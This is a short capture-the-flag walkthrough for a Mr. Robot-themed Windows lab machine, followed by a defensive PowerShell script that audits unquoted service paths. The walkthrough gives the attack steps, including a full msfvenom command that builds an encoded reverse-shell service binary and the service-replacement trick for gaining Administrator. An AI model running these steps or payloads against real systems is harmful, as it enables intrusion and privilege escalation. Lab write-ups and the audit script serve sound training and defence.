Steel Mountain | nmap, metasploit, msfvenom

Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.

idk kev

  1. reverse image search image on page, or check page source
  2. nmap -A <ip>
  3. opening webserver in browser
  4. checking cves on webserver and version
  5. use metasploit exploit, set rhosts and rport
  6. run
  7. move to desktop and get flag
  8. upload PowerUp to target: upload <path to file>
  9. load powershell: load powershell
  10. enter powershell: powershell_shell
  11. load PowerUp.ps1
  12. Invoke-AllChecks
  13. check for restartable services with unquoted service path
  14. generate reverse shell using msfvenom
  15. msfvenom -p windows/shell_reverse_tcp LHOST=10.10.48.224 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
  16. replace real service with generated one
  17. start netcat listener
  18. start and stop service
  19. Profit
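
The condition step 13 looks for can be audited from the defender's side. The script below is an added example, not part of the original notes or of PowerUp: it lists services whose executable path contains a space but is not quoted, and reports which parent folders let a broad group create files. The function names and the list of group names are assumptions made for this example (the names are the English ones and differ on localized Windows).

```powershell
# Added audit example, not part of the original notes.
# Returns the executable path when it is unquoted and contains a space.
function Get-UnquotedImagePath {
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) { return $null }             # already quoted
    if ($p -notmatch '^(.+?\.exe)\b') { return $null }    # no .exe image found
    if ($Matches[1].Contains(' ')) { return $Matches[1] }
    return $null
}

# Allow ACEs that let a broad group create files in a directory.
function Get-BroadWriteAce {
    param([string]$Directory)
    # Assumption: these well-known principals stand for "non-admin users".
    $broad = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users'
    $mask  = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData'
    (Get-Acl -LiteralPath $Directory -ErrorAction SilentlyContinue).Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $broad -contains $_.IdentityReference.Value -and
            [int]($_.FileSystemRights -band $mask) -ne 0
        }
}

# Walk every service and report the ones that need fixing.
Get-CimInstance -ClassName Win32_Service | ForEach-Object {
    $image = Get-UnquotedImagePath $_.PathName
    if (-not $image) { return }
    $writable = @()
    $dir = Split-Path -Path $image -Parent
    while ($dir) {
        if (Get-BroadWriteAce $dir) { $writable += $dir }
        $dir = Split-Path -Path $dir -Parent
    }
    [pscustomobject]@{
        Name            = $_.Name
        StartName       = $_.StartName
        StartMode       = $_.StartMode
        PathName        = $_.PathName
        WritableParents = $writable -join '; '
    }
}
```

Services with a non-empty WritableParents value are the ones to fix first: wrap the ImagePath value under HKLM\SYSTEM\CurrentControlSet\Services\<service name> in double quotes and remove the write permission from the listed folders.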
Last modified 2023.11.02